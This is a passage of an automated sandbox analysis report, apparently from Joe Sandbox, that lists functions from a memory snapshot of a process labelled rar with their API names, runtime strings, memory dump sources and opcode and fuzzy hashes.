                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: CMT
                                                                                                                                                                                                                                • API String ID: 0-2756464174
                                                                                                                                                                                                                                • Opcode ID: b4ab7884751323d34667fa1b193a3ce4b166b4df9b755dd49a4274d25c618ef0
                                                                                                                                                                                                                                • Instruction ID: 8be619f76e39a1cad9e14080c3e766096d2dacf26fda80d0df70dd49fa8257a2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4ab7884751323d34667fa1b193a3ce4b166b4df9b755dd49a4274d25c618ef0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BD1B462A1858281EB25DF26D8501BD63E1FF89B80F4445B2EA6E877D5EF3CF55AC300
                                                                                                                                                                                                                                Function 00007FF6FAA886D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAA88704
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA84E3C: GetCurrentProcess.KERNEL32(00007FF6FAA89CC5), ref: 00007FF6FAA84E69
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                                                                • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                • Instruction ID: ca8376698f5876f27bc1f5c81bf8fb11261c3e6f8b993da61f0b2779fd131374
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A151C162F19AD585EB10DFA298004BD67A5FB48BD8B4445B1DE6D97BC9EF3CE04A8300
                                                                                                                                                                                                                                Function 00007FF6FAA6B340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3429775523-0
                                                                                                                                                                                                                                • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                • Instruction ID: f1b560dd59d50d534cfbcc58d97ccee22c5305b13dd6cdae71aee0d959bd287c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E112B72B146419EEB108FB5E4912AE7BB0FB48748F40153ADA9E93B58EF3CD159CB00
                                                                                                                                                                                                                                Function 00007FF6FAA888E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                                                                • Opcode ID: 85306a6c608a838791490c1dd49bdcdd65edd45efc0d28b7ac5077cdbaf18d29
                                                                                                                                                                                                                                • Instruction ID: 41a1ad6b5b042b172ef8eb990828fe02aa6f5863a1fba8ea2b6925692293b2b7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85306a6c608a838791490c1dd49bdcdd65edd45efc0d28b7ac5077cdbaf18d29
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E31E922B186D145EB209E3298047AABB91BB89BE4F048371DE7C87BC5EE3CD5178700
                                                                                                                                                                                                                                Function 00007FF6FAA3CAFC Relevance: 3.0, APIs: 2, Instructions: 27windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3479602957-0
                                                                                                                                                                                                                                • Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                • Instruction ID: d6bb0b82a8dcf4fa041978fa53ab56b1735fe5f2176fbb0d50675424101fca7c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55F0893170C74183E3108F17B44111BA7A8FB89BD4F048174EA9993B98DF7CC5568700
                                                                                                                                                                                                                                Function 00007FF6FAA6C0A8 Relevance: 3.0, APIs: 2, Instructions: 19timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$System$File
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2838179519-0
                                                                                                                                                                                                                                • Opcode ID: 28ee689204bca22ca7f0ae273eeb0c3bf9f998676d3510b58b83d2159759f543
                                                                                                                                                                                                                                • Instruction ID: e544cb7b934f46771aa5e59051a21e6d7b109685d8b5d261dbfffe30db176e61
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28ee689204bca22ca7f0ae273eeb0c3bf9f998676d3510b58b83d2159759f543
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0E03962618A4181EF519F10F89116AB360FBA8788F441122E69E876A8EE2CD25ACB00
                                                                                                                                                                                                                                Function 00007FF6FAA43144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DiskFreeSpace
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1705453755-0
                                                                                                                                                                                                                                • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                                • Instruction ID: 4385df8a7675e1835e4df88cd2ad30de46084f58b3311cb698b63089641c2b87
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3014C7262868187EB70DB19E4413ABB3A1FB88744F900171F69CC2698EF3CD64ACF50
                                                                                                                                                                                                                                Function 00007FF6FAA89D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                • Opcode ID: 70d3c2c663c2eec3c7abe55d9b20e9285272005f266212ac2cd176c9e927fba8
                                                                                                                                                                                                                                • Instruction ID: 2122fab8135ced3fb58c56ea9106470697df3c8016b584ce3bed355a9960b487
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70d3c2c663c2eec3c7abe55d9b20e9285272005f266212ac2cd176c9e927fba8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2B09220E07B42C2EB882B216C8622423A47F48700F8801B8C55D90360EF2D60BA9700
                                                                                                                                                                                                                                Function 00007FF6FAA8DE20 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8f9fe6a0e708da395deaa9719d2eaf30e970c7ef7031061cc4a3703374185ea3
                                                                                                                                                                                                                                • Instruction ID: 5aad7cbdfa77e078a8c66c11835b064122f8391aea7249b1e236eeabaff23d82
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f9fe6a0e708da395deaa9719d2eaf30e970c7ef7031061cc4a3703374185ea3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF06871B192958AEB948F28A40262977E0F718380F40807AE59DC3B44DB3CD0659F04
                                                                                                                                                                                                                                Function 00007FF6FAA7B6D8 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e2ce7112df4d35fd3721b6807b6281889e1b5803173610b7745d5ca91cf06b82
                                                                                                                                                                                                                                • Instruction ID: 870fd44137c12f8b92eb975cb7dd43cac9059f3a1923c05047cb99260d3817c8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2ce7112df4d35fd3721b6807b6281889e1b5803173610b7745d5ca91cf06b82
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8A00162908A06D5E784AF01E9504326224AB54744B4005B1D16E810E8AE3DA55AC240
                                                                                                                                                                                                                                Function 00007FF6FAA86130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                • Instruction ID: 42fafcd89e9db0e74c2bb0dae81881d5ee7becb6dce539a1eab8f387bfe953e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
